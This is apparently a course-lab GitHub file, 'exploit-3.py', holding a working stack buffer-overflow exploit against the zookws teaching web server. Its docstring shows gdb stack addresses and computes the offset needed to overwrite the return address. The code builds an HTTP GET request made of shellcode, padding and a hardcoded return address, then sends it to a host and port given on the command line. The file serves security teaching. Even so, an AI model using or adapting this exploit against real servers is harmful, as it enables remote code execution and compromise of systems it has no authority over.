-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit-3.py
106 lines (86 loc) · 2.44 KB
/
exploit-3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/python
"""
Exploiting the buffer reqpath at zookd.c/process_client:65.
Debugging to find out the return address:
(gdb) print &reqpath
$2 = (char (*)[2048]) 0xbfffee08
(gdb) print &errmsg
$4 = (const char **) 0xbffff608
(gdb) print &i
$5 = (int *) 0xbffff60c
(gdb) info registers
eax 0x5 5
ecx 0xbffff620 -1073744352
edx 0x401d1000 1075646464
ebx 0x401d1000 1075646464
esp 0xbfffede0 0xbfffede0
ebp 0xbffff618 0xbffff618
...
Our stack should look something like this:
ret 0xbffff61c size=4
ebp 0xbffff618 size=4
...
8 bytes for local variables?
...
i 0xbffff60c size=4
errmsg 0xbffff608 size=4
reqpath 0xbfffee08 size=2048
...
esp 0xbfffede0
So to write over ret, we need to overflow reqpath by 20 bytes and then set ret
with the next 4 bytes.
"""
import sys
import socket
import traceback
import urllib
import struct
####
## You might find it useful to define variables that store various
## stack or function addresses from the zookd / zookfs processes,
## which you can then use in build_exploit(); the following are just
## examples.
reqpath_buffer_addr = 0xbfffee08
## This is the function that you should modify to construct an
## HTTP request that will cause a buffer overflow in some part
## of the zookws web server and exploit it.
def build_exploit(shellcode):
req = 'GET /' + \
urllib.quote(shellcode) + \
(2048 + 20 - len(shellcode) - 1) * 'X' + \
struct.pack('<I', reqpath_buffer_addr) + \
' HTTP/1.0\r\n' + \
'\r\n'
return req
####
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
####
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())